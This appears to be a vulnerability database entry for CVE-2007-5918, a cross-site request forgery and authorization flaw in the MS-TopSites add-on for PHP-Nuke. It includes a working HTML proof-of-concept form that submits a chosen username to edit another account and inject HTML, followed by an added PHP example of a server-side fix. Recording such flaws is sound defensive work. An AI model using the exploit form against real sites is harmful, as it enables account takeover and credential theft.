Weblord.it MS-TopSites add-on edit.php Cross-Site Request Forgery Vulnerability

Vulnerability ID: 1113909
Vulnerability type: Cross-site request forgery
Published: 2007-11-06
Updated: 2007-11-20
CVE ID: CVE-2007-5918
CNNVD-ID: CNNVD-200711-143
Platform: PHP
CVSS score: 6.0
|Vulnerability Source
https://www.exploit-db.com/exploits/30745
https://www.securityfocus.com/bid/26358
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-143
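|Vulnerability Details
A cross-site request forgery vulnerability exists in edit.php in the MS-TopSites add-on for PHP-Nuke. The script does not verify that the uname parameter matches the current user, which allows remote authenticated users to change arbitrary account attributes, or to change the SiteTitleName field, by modifying the uname value in an edit action to modules.php.
|Exploit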
source: http://www.securityfocus.com/bid/26358/info

MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials. 

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value='' name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="mail@url.com" name="email"> Email<br />
<input size="92" type="text" value='' name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</form></body>
</html>
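
A server-side check that addresses the flaw described above, as an added PHP example that is not MS-TopSites or PHP-Nuke code. The function name, the session keys and the `csrf_token` field are assumptions; `uname` and `sname` are the form fields shown in the proof of concept.

```php
<?php
declare(strict_types=1);
// Added illustration; not MS-TopSites or PHP-Nuke source. The function name,
// session keys and csrf_token field are hypothetical.

/**
 * Decide whether an edit request may proceed and return the fields to store.
 * $session: server-side session data; $post: the submitted form fields.
 */
function authorize_site_edit(array $session, array $post): array
{
    // 1. The caller must be logged in; identity comes from the session only.
    $owner = $session['username'] ?? null;
    if (!is_string($owner) || $owner === '') {
        return ['ok' => false, 'reason' => 'not authenticated'];
    }
    // 2. Anti-CSRF: per-session token, compared in constant time.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === ''
        || !hash_equals($expected, $supplied)) {
        return ['ok' => false, 'reason' => 'bad csrf token'];
    }
    // 3. A client-supplied uname that names another account is rejected.
    if (isset($post['uname']) && $post['uname'] !== $owner) {
        return ['ok' => false, 'reason' => 'uname does not match session user'];
    }
    // 4. HTML-encode the title so markup in sname renders as text.
    $sname = htmlspecialchars((string)($post['sname'] ?? ''), ENT_QUOTES, 'UTF-8');
    return ['ok' => true, 'uname' => $owner, 'sname' => $sname];
}

// Constructed sample data: one session and three requests against it.
$session = ['username' => 'alice', 'csrf_token' => bin2hex(random_bytes(16))];
$token = $session['csrf_token'];
$requests = [
    'cross-site post, no token' => ['uname' => 'bob', 'sname' => 'x'],
    'token, foreign uname'      => ['uname' => 'bob', 'sname' => 'x', 'csrf_token' => $token],
    'legitimate edit'           => ['uname' => 'alice', 'sname' => '<b>My site</b>', 'csrf_token' => $token],
];
foreach ($requests as $label => $post) {
    echo $label, ': ', json_encode(authorize_site_edit($session, $post)), PHP_EOL;
}
```

Only the third request is accepted, and the account it applies to is taken from the session rather than from the submitted form.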
|Affected Products
weblord.it MS TopSites 0
|References

Source: BID
Name: 26358
Link: http://www.securityfocus.com/bid/26358
Source: BUGTRAQ
Name: 20071106 PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection
Link: http://www.securityfocus.com/archive/1/archive/1/483353/100/0/threaded
Source: MISC
Link: http://0x90.com.ar/Advisory/20071106.txt